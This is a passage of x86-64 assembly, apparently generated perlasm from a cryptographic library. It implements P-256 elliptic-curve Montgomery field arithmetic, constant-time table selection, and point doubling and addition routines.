adoxq %rbp,%r12
mulxq 24+128(%rsi),%rcx,%rbp
movq %r9,%rdx
adcxq %rcx,%r12
shlxq %r14,%r9,%rcx
adoxq %rbp,%r13
shrxq %r14,%r9,%rbp
adcxq %r8,%r13
adoxq %r8,%r8
adcq $0,%r8
addq %rcx,%r10
adcq %rbp,%r11
mulxq %r15,%rcx,%rbp
movq 16(%rbx),%rdx
adcq %rcx,%r12
adcq %rbp,%r13
adcq $0,%r8
xorq %r9,%r9
mulxq 0+128(%rsi),%rcx,%rbp
adcxq %rcx,%r10
adoxq %rbp,%r11
mulxq 8+128(%rsi),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq 16+128(%rsi),%rcx,%rbp
adcxq %rcx,%r12
adoxq %rbp,%r13
mulxq 24+128(%rsi),%rcx,%rbp
movq %r10,%rdx
adcxq %rcx,%r13
shlxq %r14,%r10,%rcx
adoxq %rbp,%r8
shrxq %r14,%r10,%rbp
adcxq %r9,%r8
adoxq %r9,%r9
adcq $0,%r9
addq %rcx,%r11
adcq %rbp,%r12
mulxq %r15,%rcx,%rbp
movq 24(%rbx),%rdx
adcq %rcx,%r13
adcq %rbp,%r8
adcq $0,%r9
xorq %r10,%r10
mulxq 0+128(%rsi),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq 8+128(%rsi),%rcx,%rbp
adcxq %rcx,%r12
adoxq %rbp,%r13
mulxq 16+128(%rsi),%rcx,%rbp
adcxq %rcx,%r13
adoxq %rbp,%r8
mulxq 24+128(%rsi),%rcx,%rbp
movq %r11,%rdx
adcxq %rcx,%r8
shlxq %r14,%r11,%rcx
adoxq %rbp,%r9
shrxq %r14,%r11,%rbp
adcxq %r10,%r9
adoxq %r10,%r10
adcq $0,%r10
addq %rcx,%r12
adcq %rbp,%r13
mulxq %r15,%rcx,%rbp
movq %r12,%rbx
movq L$poly+8(%rip),%r14
adcq %rcx,%r8
movq %r13,%rdx
adcq %rbp,%r9
adcq $0,%r10
xorl %eax,%eax
movq %r8,%rcx
sbbq $-1,%r12
sbbq %r14,%r13
sbbq $0,%r8
movq %r9,%rbp
sbbq %r15,%r9
sbbq $0,%r10
cmovcq %rbx,%r12
cmovcq %rdx,%r13
movq %r12,0(%rdi)
cmovcq %rcx,%r8
movq %r13,8(%rdi)
cmovcq %rbp,%r9
movq %r8,16(%rdi)
movq %r9,24(%rdi)
ret
.globl _ecp_nistz256_sqr_mont_adx
.private_extern _ecp_nistz256_sqr_mont_adx
.p2align 5
_ecp_nistz256_sqr_mont_adx:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
L$sqrx_body:
movq 0(%rsi),%rdx
movq 8(%rsi),%r14
movq 16(%rsi),%r15
movq 24(%rsi),%r8
leaq -128(%rsi),%rsi
call __ecp_nistz256_sqr_montx
movq 0(%rsp),%r15
movq 8(%rsp),%r14
movq 16(%rsp),%r13
movq 24(%rsp),%r12
movq 32(%rsp),%rbx
movq 40(%rsp),%rbp
leaq 48(%rsp),%rsp
L$sqrx_epilogue:
ret
.p2align 5
__ecp_nistz256_sqr_montx:
mulxq %r14,%r9,%r10
mulxq %r15,%rcx,%r11
xorl %eax,%eax
adcq %rcx,%r10
mulxq %r8,%rbp,%r12
movq %r14,%rdx
adcq %rbp,%r11
adcq $0,%r12
xorq %r13,%r13
mulxq %r15,%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq %r8,%rcx,%rbp
movq %r15,%rdx
adcxq %rcx,%r12
adoxq %rbp,%r13
adcq $0,%r13
mulxq %r8,%rcx,%r14
movq 0+128(%rsi),%rdx
xorq %r15,%r15
adcxq %r9,%r9
adoxq %rcx,%r13
adcxq %r10,%r10
adoxq %r15,%r14
mulxq %rdx,%r8,%rbp
movq 8+128(%rsi),%rdx
adcxq %r11,%r11
adoxq %rbp,%r9
adcxq %r12,%r12
mulxq %rdx,%rcx,%rax
movq 16+128(%rsi),%rdx
adcxq %r13,%r13
adoxq %rcx,%r10
adcxq %r14,%r14
.byte 0x67
mulxq %rdx,%rcx,%rbp
movq 24+128(%rsi),%rdx
adoxq %rax,%r11
adcxq %r15,%r15
adoxq %rcx,%r12
movq $32,%rsi
adoxq %rbp,%r13
.byte 0x67,0x67
mulxq %rdx,%rcx,%rax
movq L$poly+24(%rip),%rdx
adoxq %rcx,%r14
shlxq %rsi,%r8,%rcx
adoxq %rax,%r15
shrxq %rsi,%r8,%rax
movq %rdx,%rbp
addq %rcx,%r9
adcq %rax,%r10
mulxq %r8,%rcx,%r8
adcq %rcx,%r11
shlxq %rsi,%r9,%rcx
adcq $0,%r8
shrxq %rsi,%r9,%rax
addq %rcx,%r10
adcq %rax,%r11
mulxq %r9,%rcx,%r9
adcq %rcx,%r8
shlxq %rsi,%r10,%rcx
adcq $0,%r9
shrxq %rsi,%r10,%rax
addq %rcx,%r11
adcq %rax,%r8
mulxq %r10,%rcx,%r10
adcq %rcx,%r9
shlxq %rsi,%r11,%rcx
adcq $0,%r10
shrxq %rsi,%r11,%rax
addq %rcx,%r8
adcq %rax,%r9
mulxq %r11,%rcx,%r11
adcq %rcx,%r10
adcq $0,%r11
xorq %rdx,%rdx
addq %r8,%r12
movq L$poly+8(%rip),%rsi
adcq %r9,%r13
movq %r12,%r8
adcq %r10,%r14
adcq %r11,%r15
movq %r13,%r9
adcq $0,%rdx
subq $-1,%r12
movq %r14,%r10
sbbq %rsi,%r13
sbbq $0,%r14
movq %r15,%r11
sbbq %rbp,%r15
sbbq $0,%rdx
cmovcq %r8,%r12
cmovcq %r9,%r13
movq %r12,0(%rdi)
cmovcq %r10,%r14
movq %r13,8(%rdi)
cmovcq %r11,%r15
movq %r14,16(%rdi)
movq %r15,24(%rdi)
ret
.globl _ecp_nistz256_select_w5_nohw
.private_extern _ecp_nistz256_select_w5_nohw
.p2align 5
_ecp_nistz256_select_w5_nohw:
_CET_ENDBR
movdqa L$One(%rip),%xmm0
movd %edx,%xmm1
pxor %xmm2,%xmm2
pxor %xmm3,%xmm3
pxor %xmm4,%xmm4
pxor %xmm5,%xmm5
pxor %xmm6,%xmm6
pxor %xmm7,%xmm7
movdqa %xmm0,%xmm8
pshufd $0,%xmm1,%xmm1
movq $16,%rax
L$select_loop_sse_w5:
movdqa %xmm8,%xmm15
paddd %xmm0,%xmm8
pcmpeqd %xmm1,%xmm15
movdqa 0(%rsi),%xmm9
movdqa 16(%rsi),%xmm10
movdqa 32(%rsi),%xmm11
movdqa 48(%rsi),%xmm12
movdqa 64(%rsi),%xmm13
movdqa 80(%rsi),%xmm14
leaq 96(%rsi),%rsi
pand %xmm15,%xmm9
pand %xmm15,%xmm10
por %xmm9,%xmm2
pand %xmm15,%xmm11
por %xmm10,%xmm3
pand %xmm15,%xmm12
por %xmm11,%xmm4
pand %xmm15,%xmm13
por %xmm12,%xmm5
pand %xmm15,%xmm14
por %xmm13,%xmm6
por %xmm14,%xmm7
decq %rax
jnz L$select_loop_sse_w5
movdqu %xmm2,0(%rdi)
movdqu %xmm3,16(%rdi)
movdqu %xmm4,32(%rdi)
movdqu %xmm5,48(%rdi)
movdqu %xmm6,64(%rdi)
movdqu %xmm7,80(%rdi)
ret
L$SEH_end_ecp_nistz256_select_w5_nohw:
.globl _ecp_nistz256_select_w7_nohw
.private_extern _ecp_nistz256_select_w7_nohw
.p2align 5
_ecp_nistz256_select_w7_nohw:
_CET_ENDBR
movdqa L$One(%rip),%xmm8
movd %edx,%xmm1
pxor %xmm2,%xmm2
pxor %xmm3,%xmm3
pxor %xmm4,%xmm4
pxor %xmm5,%xmm5
movdqa %xmm8,%xmm0
pshufd $0,%xmm1,%xmm1
movq $64,%rax
L$select_loop_sse_w7:
movdqa %xmm8,%xmm15
paddd %xmm0,%xmm8
movdqa 0(%rsi),%xmm9
movdqa 16(%rsi),%xmm10
pcmpeqd %xmm1,%xmm15
movdqa 32(%rsi),%xmm11
movdqa 48(%rsi),%xmm12
leaq 64(%rsi),%rsi
pand %xmm15,%xmm9
pand %xmm15,%xmm10
por %xmm9,%xmm2
pand %xmm15,%xmm11
por %xmm10,%xmm3
pand %xmm15,%xmm12
por %xmm11,%xmm4
prefetcht0 255(%rsi)
por %xmm12,%xmm5
decq %rax
jnz L$select_loop_sse_w7
movdqu %xmm2,0(%rdi)
movdqu %xmm3,16(%rdi)
movdqu %xmm4,32(%rdi)
movdqu %xmm5,48(%rdi)
ret
L$SEH_end_ecp_nistz256_select_w7_nohw:
.globl _ecp_nistz256_select_w5_avx2
.private_extern _ecp_nistz256_select_w5_avx2
.p2align 5
_ecp_nistz256_select_w5_avx2:
_CET_ENDBR
vzeroupper
vmovdqa L$Two(%rip),%ymm0
vpxor %ymm2,%ymm2,%ymm2
vpxor %ymm3,%ymm3,%ymm3
vpxor %ymm4,%ymm4,%ymm4
vmovdqa L$One(%rip),%ymm5
vmovdqa L$Two(%rip),%ymm10
vmovd %edx,%xmm1
vpermd %ymm1,%ymm2,%ymm1
movq $8,%rax
L$select_loop_avx2_w5:
vmovdqa 0(%rsi),%ymm6
vmovdqa 32(%rsi),%ymm7
vmovdqa 64(%rsi),%ymm8
vmovdqa 96(%rsi),%ymm11
vmovdqa 128(%rsi),%ymm12
vmovdqa 160(%rsi),%ymm13
vpcmpeqd %ymm1,%ymm5,%ymm9
vpcmpeqd %ymm1,%ymm10,%ymm14
vpaddd %ymm0,%ymm5,%ymm5
vpaddd %ymm0,%ymm10,%ymm10
leaq 192(%rsi),%rsi
vpand %ymm9,%ymm6,%ymm6
vpand %ymm9,%ymm7,%ymm7
vpand %ymm9,%ymm8,%ymm8
vpand %ymm14,%ymm11,%ymm11
vpand %ymm14,%ymm12,%ymm12
vpand %ymm14,%ymm13,%ymm13
vpxor %ymm6,%ymm2,%ymm2
vpxor %ymm7,%ymm3,%ymm3
vpxor %ymm8,%ymm4,%ymm4
vpxor %ymm11,%ymm2,%ymm2
vpxor %ymm12,%ymm3,%ymm3
vpxor %ymm13,%ymm4,%ymm4
decq %rax
jnz L$select_loop_avx2_w5
vmovdqu %ymm2,0(%rdi)
vmovdqu %ymm3,32(%rdi)
vmovdqu %ymm4,64(%rdi)
vzeroupper
ret
L$SEH_end_ecp_nistz256_select_w5_avx2:
.globl _ecp_nistz256_select_w7_avx2
.private_extern _ecp_nistz256_select_w7_avx2
.p2align 5
_ecp_nistz256_select_w7_avx2:
_CET_ENDBR
vzeroupper
vmovdqa L$Three(%rip),%ymm0
vpxor %ymm2,%ymm2,%ymm2
vpxor %ymm3,%ymm3,%ymm3
vmovdqa L$One(%rip),%ymm4
vmovdqa L$Two(%rip),%ymm8
vmovdqa L$Three(%rip),%ymm12
vmovd %edx,%xmm1
vpermd %ymm1,%ymm2,%ymm1
movq $21,%rax
L$select_loop_avx2_w7:
vmovdqa 0(%rsi),%ymm5
vmovdqa 32(%rsi),%ymm6
vmovdqa 64(%rsi),%ymm9
vmovdqa 96(%rsi),%ymm10
vmovdqa 128(%rsi),%ymm13
vmovdqa 160(%rsi),%ymm14
vpcmpeqd %ymm1,%ymm4,%ymm7
vpcmpeqd %ymm1,%ymm8,%ymm11
vpcmpeqd %ymm1,%ymm12,%ymm15
vpaddd %ymm0,%ymm4,%ymm4
vpaddd %ymm0,%ymm8,%ymm8
vpaddd %ymm0,%ymm12,%ymm12
leaq 192(%rsi),%rsi
vpand %ymm7,%ymm5,%ymm5
vpand %ymm7,%ymm6,%ymm6
vpand %ymm11,%ymm9,%ymm9
vpand %ymm11,%ymm10,%ymm10
vpand %ymm15,%ymm13,%ymm13
vpand %ymm15,%ymm14,%ymm14
vpxor %ymm5,%ymm2,%ymm2
vpxor %ymm6,%ymm3,%ymm3
vpxor %ymm9,%ymm2,%ymm2
vpxor %ymm10,%ymm3,%ymm3
vpxor %ymm13,%ymm2,%ymm2
vpxor %ymm14,%ymm3,%ymm3
decq %rax
jnz L$select_loop_avx2_w7
vmovdqa 0(%rsi),%ymm5
vmovdqa 32(%rsi),%ymm6
vpcmpeqd %ymm1,%ymm4,%ymm7
vpand %ymm7,%ymm5,%ymm5
vpand %ymm7,%ymm6,%ymm6
vpxor %ymm5,%ymm2,%ymm2
vpxor %ymm6,%ymm3,%ymm3
vmovdqu %ymm2,0(%rdi)
vmovdqu %ymm3,32(%rdi)
vzeroupper
ret
L$SEH_end_ecp_nistz256_select_w7_avx2:
.p2align 5
__ecp_nistz256_add_toq:
xorq %r11,%r11
addq 0(%rbx),%r12
adcq 8(%rbx),%r13
movq %r12,%rax
adcq 16(%rbx),%r8
adcq 24(%rbx),%r9
movq %r13,%rbp
adcq $0,%r11
subq $-1,%r12
movq %r8,%rcx
sbbq %r14,%r13
sbbq $0,%r8
movq %r9,%r10
sbbq %r15,%r9
sbbq $0,%r11
cmovcq %rax,%r12
cmovcq %rbp,%r13
movq %r12,0(%rdi)
cmovcq %rcx,%r8
movq %r13,8(%rdi)
cmovcq %r10,%r9
movq %r8,16(%rdi)
movq %r9,24(%rdi)
ret
.p2align 5
__ecp_nistz256_sub_fromq:
subq 0(%rbx),%r12
sbbq 8(%rbx),%r13
movq %r12,%rax
sbbq 16(%rbx),%r8
sbbq 24(%rbx),%r9
movq %r13,%rbp
sbbq %r11,%r11
addq $-1,%r12
movq %r8,%rcx
adcq %r14,%r13
adcq $0,%r8
movq %r9,%r10
adcq %r15,%r9
testq %r11,%r11
cmovzq %rax,%r12
cmovzq %rbp,%r13
movq %r12,0(%rdi)
cmovzq %rcx,%r8
movq %r13,8(%rdi)
cmovzq %r10,%r9
movq %r8,16(%rdi)
movq %r9,24(%rdi)
ret
.p2align 5
__ecp_nistz256_subq:
subq %r12,%rax
sbbq %r13,%rbp
movq %rax,%r12
sbbq %r8,%rcx
sbbq %r9,%r10
movq %rbp,%r13
sbbq %r11,%r11
addq $-1,%rax
movq %rcx,%r8
adcq %r14,%rbp
adcq $0,%rcx
movq %r10,%r9
adcq %r15,%r10
testq %r11,%r11
cmovnzq %rax,%r12
cmovnzq %rbp,%r13
cmovnzq %rcx,%r8
cmovnzq %r10,%r9
ret
.p2align 5
__ecp_nistz256_mul_by_2q:
xorq %r11,%r11
addq %r12,%r12
adcq %r13,%r13
movq %r12,%rax
adcq %r8,%r8
adcq %r9,%r9
movq %r13,%rbp
adcq $0,%r11
subq $-1,%r12
movq %r8,%rcx
sbbq %r14,%r13
sbbq $0,%r8
movq %r9,%r10
sbbq %r15,%r9
sbbq $0,%r11
cmovcq %rax,%r12
cmovcq %rbp,%r13
movq %r12,0(%rdi)
cmovcq %rcx,%r8
movq %r13,8(%rdi)
cmovcq %r10,%r9
movq %r8,16(%rdi)
movq %r9,24(%rdi)
ret
.globl _ecp_nistz256_point_double_nohw
.private_extern _ecp_nistz256_point_double_nohw
.p2align 5
_ecp_nistz256_point_double_nohw:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
subq $160+8,%rsp
L$point_doubleq_body:
L$point_double_shortcutq:
movdqu 0(%rsi),%xmm0
movq %rsi,%rbx
movdqu 16(%rsi),%xmm1
movq 32+0(%rsi),%r12
movq 32+8(%rsi),%r13
movq 32+16(%rsi),%r8
movq 32+24(%rsi),%r9
movq L$poly+8(%rip),%r14
movq L$poly+24(%rip),%r15
movdqa %xmm0,96(%rsp)
movdqa %xmm1,96+16(%rsp)
leaq 32(%rdi),%r10
leaq 64(%rdi),%r11
.byte 102,72,15,110,199
.byte 102,73,15,110,202
.byte 102,73,15,110,211
leaq 0(%rsp),%rdi
call __ecp_nistz256_mul_by_2q
movq 64+0(%rsi),%rax
movq 64+8(%rsi),%r14
movq 64+16(%rsi),%r15
movq 64+24(%rsi),%r8
leaq 64-0(%rsi),%rsi
leaq 64(%rsp),%rdi
call __ecp_nistz256_sqr_montq
movq 0+0(%rsp),%rax
movq 8+0(%rsp),%r14
leaq 0+0(%rsp),%rsi
movq 16+0(%rsp),%r15
movq 24+0(%rsp),%r8
leaq 0(%rsp),%rdi
call __ecp_nistz256_sqr_montq
movq 32(%rbx),%rax
movq 64+0(%rbx),%r9
movq 64+8(%rbx),%r10
movq 64+16(%rbx),%r11
movq 64+24(%rbx),%r12
leaq 64-0(%rbx),%rsi
leaq 32(%rbx),%rbx
.byte 102,72,15,126,215
call __ecp_nistz256_mul_montq
call __ecp_nistz256_mul_by_2q
movq 96+0(%rsp),%r12
movq 96+8(%rsp),%r13
leaq 64(%rsp),%rbx
movq 96+16(%rsp),%r8
movq 96+24(%rsp),%r9
leaq 32(%rsp),%rdi
call __ecp_nistz256_add_toq
movq 96+0(%rsp),%r12
movq 96+8(%rsp),%r13
leaq 64(%rsp),%rbx
movq 96+16(%rsp),%r8
movq 96+24(%rsp),%r9
leaq 64(%rsp),%rdi
call __ecp_nistz256_sub_fromq
movq 0+0(%rsp),%rax
movq 8+0(%rsp),%r14
leaq 0+0(%rsp),%rsi
movq 16+0(%rsp),%r15
movq 24+0(%rsp),%r8
.byte 102,72,15,126,207
call __ecp_nistz256_sqr_montq
xorq %r9,%r9
movq %r12,%rax
addq $-1,%r12
movq %r13,%r10
adcq %rsi,%r13
movq %r14,%rcx
adcq $0,%r14
movq %r15,%r8
adcq %rbp,%r15
adcq $0,%r9
xorq %rsi,%rsi
testq $1,%rax
cmovzq %rax,%r12
cmovzq %r10,%r13
cmovzq %rcx,%r14
cmovzq %r8,%r15
cmovzq %rsi,%r9
movq %r13,%rax
shrq $1,%r12
shlq $63,%rax
movq %r14,%r10
shrq $1,%r13
orq %rax,%r12
shlq $63,%r10
movq %r15,%rcx
shrq $1,%r14
orq %r10,%r13
shlq $63,%rcx
movq %r12,0(%rdi)
shrq $1,%r15
movq %r13,8(%rdi)
shlq $63,%r9
orq %rcx,%r14
orq %r9,%r15
movq %r14,16(%rdi)
movq %r15,24(%rdi)
movq 64(%rsp),%rax
leaq 64(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq 0+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 32(%rsp),%rdi
call __ecp_nistz256_mul_montq
leaq 128(%rsp),%rdi
call __ecp_nistz256_mul_by_2q
leaq 32(%rsp),%rbx
leaq 32(%rsp),%rdi
call __ecp_nistz256_add_toq
movq 96(%rsp),%rax
leaq 96(%rsp),%rbx
movq 0+0(%rsp),%r9
movq 8+0(%rsp),%r10
leaq 0+0(%rsp),%rsi
movq 16+0(%rsp),%r11
movq 24+0(%rsp),%r12
leaq 0(%rsp),%rdi
call __ecp_nistz256_mul_montq
leaq 128(%rsp),%rdi
call __ecp_nistz256_mul_by_2q
movq 0+32(%rsp),%rax
movq 8+32(%rsp),%r14
leaq 0+32(%rsp),%rsi
movq 16+32(%rsp),%r15
movq 24+32(%rsp),%r8
.byte 102,72,15,126,199
call __ecp_nistz256_sqr_montq
leaq 128(%rsp),%rbx
movq %r14,%r8
movq %r15,%r9
movq %rsi,%r14
movq %rbp,%r15
call __ecp_nistz256_sub_fromq
movq 0+0(%rsp),%rax
movq 0+8(%rsp),%rbp
movq 0+16(%rsp),%rcx
movq 0+24(%rsp),%r10
leaq 0(%rsp),%rdi
call __ecp_nistz256_subq
movq 32(%rsp),%rax
leaq 32(%rsp),%rbx
movq %r12,%r14
xorl %ecx,%ecx
movq %r12,0+0(%rsp)
movq %r13,%r10
movq %r13,0+8(%rsp)
cmovzq %r8,%r11
movq %r8,0+16(%rsp)
leaq 0-0(%rsp),%rsi
cmovzq %r9,%r12
movq %r9,0+24(%rsp)
movq %r14,%r9
leaq 0(%rsp),%rdi
call __ecp_nistz256_mul_montq
.byte 102,72,15,126,203
.byte 102,72,15,126,207
call __ecp_nistz256_sub_fromq
leaq 160+56(%rsp),%rsi
movq -48(%rsi),%r15
movq -40(%rsi),%r14
movq -32(%rsi),%r13
movq -24(%rsi),%r12
movq -16(%rsi),%rbx
movq -8(%rsi),%rbp
leaq (%rsi),%rsp
L$point_doubleq_epilogue:
ret
.globl _ecp_nistz256_point_add_nohw
.private_extern _ecp_nistz256_point_add_nohw
.p2align 5
_ecp_nistz256_point_add_nohw:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
subq $576+8,%rsp
L$point_addq_body:
movdqu 0(%rsi),%xmm0
movdqu 16(%rsi),%xmm1
movdqu 32(%rsi),%xmm2
movdqu 48(%rsi),%xmm3
movdqu 64(%rsi),%xmm4
movdqu 80(%rsi),%xmm5
movq %rsi,%rbx
movq %rdx,%rsi
movdqa %xmm0,384(%rsp)
movdqa %xmm1,384+16(%rsp)
movdqa %xmm2,416(%rsp)
movdqa %xmm3,416+16(%rsp)
movdqa %xmm4,448(%rsp)
movdqa %xmm5,448+16(%rsp)
por %xmm4,%xmm5
movdqu 0(%rsi),%xmm0
pshufd $0xb1,%xmm5,%xmm3
movdqu 16(%rsi),%xmm1
movdqu 32(%rsi),%xmm2
por %xmm3,%xmm5
movdqu 48(%rsi),%xmm3
movq 64+0(%rsi),%rax
movq 64+8(%rsi),%r14
movq 64+16(%rsi),%r15
movq 64+24(%rsi),%r8
movdqa %xmm0,480(%rsp)
pshufd $0x1e,%xmm5,%xmm4
movdqa %xmm1,480+16(%rsp)
movdqu 64(%rsi),%xmm0
movdqu 80(%rsi),%xmm1
movdqa %xmm2,512(%rsp)
movdqa %xmm3,512+16(%rsp)
por %xmm4,%xmm5
pxor %xmm4,%xmm4
por %xmm0,%xmm1
.byte 102,72,15,110,199
leaq 64-0(%rsi),%rsi
movq %rax,544+0(%rsp)
movq %r14,544+8(%rsp)
movq %r15,544+16(%rsp)
movq %r8,544+24(%rsp)
leaq 96(%rsp),%rdi
call __ecp_nistz256_sqr_montq
pcmpeqd %xmm4,%xmm5
pshufd $0xb1,%xmm1,%xmm4
por %xmm1,%xmm4
pshufd $0,%xmm5,%xmm5
pshufd $0x1e,%xmm4,%xmm3
por %xmm3,%xmm4
pxor %xmm3,%xmm3
pcmpeqd %xmm3,%xmm4
pshufd $0,%xmm4,%xmm4
movq 64+0(%rbx),%rax
movq 64+8(%rbx),%r14
movq 64+16(%rbx),%r15
movq 64+24(%rbx),%r8
.byte 102,72,15,110,203
leaq 64-0(%rbx),%rsi
leaq 32(%rsp),%rdi
call __ecp_nistz256_sqr_montq
movq 544(%rsp),%rax
leaq 544(%rsp),%rbx
movq 0+96(%rsp),%r9
movq 8+96(%rsp),%r10
leaq 0+96(%rsp),%rsi
movq 16+96(%rsp),%r11
movq 24+96(%rsp),%r12
leaq 224(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 448(%rsp),%rax
leaq 448(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq 0+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 256(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 416(%rsp),%rax
leaq 416(%rsp),%rbx
movq 0+224(%rsp),%r9
movq 8+224(%rsp),%r10
leaq 0+224(%rsp),%rsi
movq 16+224(%rsp),%r11
movq 24+224(%rsp),%r12
leaq 224(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 512(%rsp),%rax
leaq 512(%rsp),%rbx
movq 0+256(%rsp),%r9
movq 8+256(%rsp),%r10
leaq 0+256(%rsp),%rsi
movq 16+256(%rsp),%r11
movq 24+256(%rsp),%r12
leaq 256(%rsp),%rdi
call __ecp_nistz256_mul_montq
leaq 224(%rsp),%rbx
leaq 64(%rsp),%rdi
call __ecp_nistz256_sub_fromq
orq %r13,%r12
movdqa %xmm4,%xmm2
orq %r8,%r12
orq %r9,%r12
por %xmm5,%xmm2
.byte 102,73,15,110,220
movq 384(%rsp),%rax
leaq 384(%rsp),%rbx
movq 0+96(%rsp),%r9
movq 8+96(%rsp),%r10
leaq 0+96(%rsp),%rsi
movq 16+96(%rsp),%r11
movq 24+96(%rsp),%r12
leaq 160(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 480(%rsp),%rax
leaq 480(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq 0+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 192(%rsp),%rdi
call __ecp_nistz256_mul_montq
leaq 160(%rsp),%rbx
leaq 0(%rsp),%rdi
call __ecp_nistz256_sub_fromq
orq %r13,%r12
orq %r8,%r12
orq %r9,%r12
.byte 102,73,15,126,208
.byte 102,73,15,126,217
orq %r8,%r12
.byte 0x3e
jnz L$add_proceedq
testq %r9,%r9
jz L$add_doubleq
.byte 102,72,15,126,199
pxor %xmm0,%xmm0
movdqu %xmm0,0(%rdi)
movdqu %xmm0,16(%rdi)
movdqu %xmm0,32(%rdi)
movdqu %xmm0,48(%rdi)
movdqu %xmm0,64(%rdi)
movdqu %xmm0,80(%rdi)
jmp L$add_doneq
.p2align 5
L$add_doubleq:
.byte 102,72,15,126,206
.byte 102,72,15,126,199
addq $416,%rsp
jmp L$point_double_shortcutq
.p2align 5
L$add_proceedq:
movq 0+64(%rsp),%rax
movq 8+64(%rsp),%r14
leaq 0+64(%rsp),%rsi
movq 16+64(%rsp),%r15
movq 24+64(%rsp),%r8
leaq 96(%rsp),%rdi
call __ecp_nistz256_sqr_montq
movq 448(%rsp),%rax
leaq 448(%rsp),%rbx
movq 0+0(%rsp),%r9
movq 8+0(%rsp),%r10
leaq 0+0(%rsp),%rsi
movq 16+0(%rsp),%r11
movq 24+0(%rsp),%r12
leaq 352(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 0+0(%rsp),%rax
movq 8+0(%rsp),%r14
leaq 0+0(%rsp),%rsi
movq 16+0(%rsp),%r15
movq 24+0(%rsp),%r8
leaq 32(%rsp),%rdi
call __ecp_nistz256_sqr_montq
movq 544(%rsp),%rax
leaq 544(%rsp),%rbx
movq 0+352(%rsp),%r9
movq 8+352(%rsp),%r10
leaq 0+352(%rsp),%rsi
movq 16+352(%rsp),%r11
movq 24+352(%rsp),%r12
leaq 352(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 0(%rsp),%rax
leaq 0(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq 0+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 128(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 160(%rsp),%rax
leaq 160(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq 0+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 192(%rsp),%rdi
call __ecp_nistz256_mul_montq
xorq %r11,%r11
addq %r12,%r12
leaq 96(%rsp),%rsi
adcq %r13,%r13
movq %r12,%rax
adcq %r8,%r8
adcq %r9,%r9
movq %r13,%rbp
adcq $0,%r11
subq $-1,%r12
movq %r8,%rcx
sbbq %r14,%r13
sbbq $0,%r8
movq %r9,%r10
sbbq %r15,%r9
sbbq $0,%r11
cmovcq %rax,%r12
movq 0(%rsi),%rax
cmovcq %rbp,%r13
movq 8(%rsi),%rbp
cmovcq %rcx,%r8
movq 16(%rsi),%rcx
cmovcq %r10,%r9
movq 24(%rsi),%r10
call __ecp_nistz256_subq
leaq 128(%rsp),%rbx
leaq 288(%rsp),%rdi
call __ecp_nistz256_sub_fromq
movq 192+0(%rsp),%rax
movq 192+8(%rsp),%rbp
movq 192+16(%rsp),%rcx
movq 192+24(%rsp),%r10
leaq 320(%rsp),%rdi
call __ecp_nistz256_subq
movq %r12,0(%rdi)
movq %r13,8(%rdi)
movq %r8,16(%rdi)
movq %r9,24(%rdi)
movq 128(%rsp),%rax
leaq 128(%rsp),%rbx
movq 0+224(%rsp),%r9
movq 8+224(%rsp),%r10
leaq 0+224(%rsp),%rsi
movq 16+224(%rsp),%r11
movq 24+224(%rsp),%r12
leaq 256(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 320(%rsp),%rax
leaq 320(%rsp),%rbx
movq 0+64(%rsp),%r9
movq 8+64(%rsp),%r10
leaq 0+64(%rsp),%rsi
movq 16+64(%rsp),%r11
movq 24+64(%rsp),%r12
leaq 320(%rsp),%rdi
call __ecp_nistz256_mul_montq
leaq 256(%rsp),%rbx
leaq 320(%rsp),%rdi
call __ecp_nistz256_sub_fromq
.byte 102,72,15,126,199
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 352(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 352+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand 544(%rsp),%xmm2
pand 544+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 448(%rsp),%xmm2
pand 448+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,64(%rdi)
movdqu %xmm3,80(%rdi)
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 288(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 288+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand 480(%rsp),%xmm2
pand 480+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 384(%rsp),%xmm2
pand 384+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
